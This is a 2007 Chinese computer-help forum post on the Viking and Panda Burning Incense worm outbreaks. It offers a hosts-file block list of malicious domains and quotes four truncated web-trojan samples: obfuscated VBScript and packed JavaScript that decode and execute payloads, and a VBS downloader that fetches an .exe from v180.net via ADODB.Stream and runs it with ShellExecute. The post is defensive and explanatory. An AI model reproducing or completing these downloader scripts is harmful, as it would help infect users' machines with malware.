脚本木马,大量网页木马下载脚本显身可实现(屏蔽)

大量网页木马下载脚本显身可实现(屏蔽) - 故障解答 - 电脑教程网

大量网页木马下载脚本显身可实现(屏蔽)

日期:2007-09-10   荐:
.Xil790 下面是最新的恶意病毒木马(威金、熊猫烧香)网址 请复制以下命令来屏蔽 开始 -> 运行 -> %windir%\system32\notepad.exe %windir%\system32\drivers\etc\hosts 偶在 www,q 之间做了个,号 请自行改正否则无效。         ↓该成“.” 0.0.0.0 www,qq380.com                   # Worm.Viking 0.0.0.0 www,wulin2.com.cn              # 武林外传 发现木马 0.0.0.0 www,35569.com 0.0.0.0 www,chinanet123.cn                # Worm.Nimaya 0.0.0.0 www,photo.ccoo.cn              # 恶意弹出 0.0.0.0 www,windown.com.cn 0.0.0.0 windown.com.cn 0.0.0.0 awenbin.anytome.com               # Worm.Nimaya 0.0.0.0 www,anytome.com                  # Worm.Nimaya 0.0.0.0 www,unibit.com.cn/default.asp       # 最新 Worm.Nimaya 0.0.0.0 www,krvkr.com/worm.exe          # 最新 Worm.Nimaya   关于最近“威金、熊猫烧香”病毒爆发事件。偶做了统一分析!      发现很多病毒木马都是通过:      ActiveX控件、VBScript 来实现后台下载安装运行      通过以下脚本了解到病毒木马是调用了wscript.exe命令和其他程序等,成功实现在下载      经过不断测试发现ActiveX控件设置最底,删除VBScript命令和其他需要调用的程序来禁止下载!测试效果不佳!IE跟本无法其禁止下载!      最后发现VBScript调用了X个DLL控件 只要删除其控件那么IE下载 都将失败!但部分网站 则打不开或出现未知错误等情况!偶特意写了个 脚本来实现禁止IE下载和恢复下载!      所谓的IE下载是指利用“ActiveX控件、VBScript 来实现后台下载安装运行”并不是普通下载方式!禁止IE下载 并不影响 IE正常使用和 下载、和浏览网站等!除部分需要掉用ActiveX控件、VBScript等。      可以使用该脚本来解除ActiveX控件、VBScript。和禁用 ActiveX控件、VBScript 等。注意 该脚本正在调试中!脚本根据不同人群自行设 置其功能是阻止带有病毒木马网站下载病毒木马程序!也可能给用户带来未知的疑难问题。解除即可恢复正常。调试完成后发布。请关注 (www.dngz.net)为您排除一切电脑故障

     大家有什么建议等请留下宝贵的建议!最后是偶想说说关于IE调用“ActiveX控件、VBScript下载,比较熟悉编写网页的朋友和写 ActiveX 控件、VBScript 请留下 调用了那些 DLL 库!偶这只掌握了部分      注意,屏蔽DLL库 在不影响下载,浏览等情况下可以才可以屏蔽。   1、号脚本 .htm格式   <html><head></head><body>hello```</body></html> <Script Language="VBScript"> Cn911="83,61,34,52,70,54,69,50,48,52,53,55,50, 中间部分省略... Function Rechange(Q) S=Split(Q,",") Cn922="" For i = 0 To UBound(S) Cn922=Cn922&Chr(eval(S(i))) Next Rechange=Cn922 End Function EXECUTE(Rechange(Cn911)) </Script>   2、号脚本 .VBS格式   <script language="VBScript">     on error resume next 中间部分省略...     set strm = dfile.createobject("Ad"&QQ67112525&"odb."&F4sdTRhh&"Str"&"eam","")     strm.type = 1     http.Open "GET", "http;//v180.net/qq/qq.exe", False 中间部分省略...     set exc = dfile.createobject(b1&QQ67112525&b2&F4sdTRhh&b3&b4,"")     str4="open"     exc.ShellExecute filename,"","",str4,0     </script>   3、号脚本 .VBS格式   function rechange(jijy) s=Split(jijy,",") qq976769="" For i = 0 To UBound(s) qq976769=qq976769 Chr(eval(s(i))) Next rechange=qq976769 End Function qq976769="79,110,32,69,114,114, 中间部分省略... 0,97,116,101,46,98,97,116,34,41" i=qq976769 execute(rechange(I))   4、号脚本 .js格式   eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a))) ((c=c%a)>35?String.fromCharCode(c 29):c.toString (36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function() , {return'\\w '};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b' e(c) '\\b','g'),k[c]);return p}('15("\\l\\s\\7\\9\\2 \\e\\g\\7\\1 中间部分省略... \\L")',62,68,'145|40 中间部分省略... 0|176|52|eval'.split('|'),0,{})) 时间紧张,暂写部分内容!有空在和大家聊 先附上批处理脚本图。欢迎大家提意见。

呵呵 我是新手 我知道了

又学到新鲜的东西。。。。 有意思。

标签: